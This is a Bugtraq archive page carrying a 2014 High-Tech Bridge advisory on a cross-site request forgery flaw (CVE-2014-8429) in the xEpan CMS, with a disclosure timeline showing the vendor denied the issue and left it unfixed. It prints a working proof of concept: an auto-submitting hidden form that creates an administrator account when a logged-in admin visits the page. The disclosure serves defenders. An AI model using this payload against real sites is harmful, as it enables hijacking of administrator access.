[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Сross-Site Request Forgery (CSRF) in xEpan

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Сross-Site Request Forgery (CSRF) in xEpan
From: High-Tech Bridge Security Research <advisory@xxxxxxxxxxxx>
Date: Wed, 26 Nov 2014 13:02:08 +0100 (CET)

Advisory ID: HTB23240
Product: xEpan
Vendor: Xavoc Technocrats Pvt. Ltd.
Vulnerable Version(s): 1.0.1 and probably prior
Tested Version: 1.0.1
Advisory Publication:  October 22, 2014  [without technical details]
Vendor Notification: October 22, 2014 
Public Disclosure: November 26, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-8429
Risk Level: Medium 
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Not Fixed
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which 
can be exploited to compromise vulnerable web site.


1) Сross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429

The vulnerability exists due to insufficient validation of the HTTP request 
origin when creating new user accounts. A remote unauthenticated attacker can 
trick a logged-in administrator to visit a malicious page with CSRF exploit, 
create new account with administrative privileges and get total control over 
the vulnerable website.  

A simple CSRF exploit below creates an administrative account with username 
"immuniweb" and password "password":


<form 
action="http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add&submit=web_web_owner_users_crud_virtualpage_form";
 method="post" name="main">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_name" 
value="name">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_email" 
value="email@xxxxxxxxx">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_username" 
value="immuniweb">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_password" 
value="password">
<input type="hidden" 
name="web_web_owner_users_crud_virtualpage_form_created_at" value="21/10/2014">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_type" 
value="100">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_is_active" 
value="1">
<input type="hidden" 
name="web_web_owner_users_crud_virtualpage_form_activation_code" value="">
<input type="hidden" 
name="web_web_owner_users_crud_virtualpage_form_last_login_date" value="">
<input type="hidden" name="ajax_submit" value="form_submit">
<input type="submit" id="btn">
</form>

<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Currently we are not aware of any official solution for this vulnerability.

<b>Disclosure timeline:</b>
2014-10-22 Vendor notified via several emails.
2014-10-22 Vendor denies vulnerability.
2014-11-06 Vulnerability is confirmed in the latest version of xEpan 1.0.4 
which was released on the 2nd of November (we initially suspected a "silent 
fix"). 
2014-11-06 Vulnerability confirmed in 1.0.4 as well. Vendor notified about the 
problem once again.
2014-11-10 Fix requested via several emails.
2014-11-17 Fix requested via several emails.
2014-11-24 Fix requested via several emails.
2014-11-24 Vulnerability still exist in latest version 1.0.4.1 which was 
released at November, 20.
2014-11-26 Public disclosure.


-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23240 - 
https://www.htbridge.com/advisory/HTB23240 - Сross-Site Request Forgery (CSRF) 
in xEpan.
[2] xEpan - http://www.xepan.org/ - xEpan is a an open source content 
management system (CMS) with Drag &amp; Drop, bootstrap and live text editing.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

Prev by Date: [ MDVSA-2014:228 ] phpmyadmin
Next by Date: CVE-2014-5439 - Root shell on Sniffit [with exploit]
Previous by thread: [ MDVSA-2014:228 ] phpmyadmin
Next by thread: CVE-2014-5439 - Root shell on Sniffit [with exploit]
Index(es):
- Date
- Thread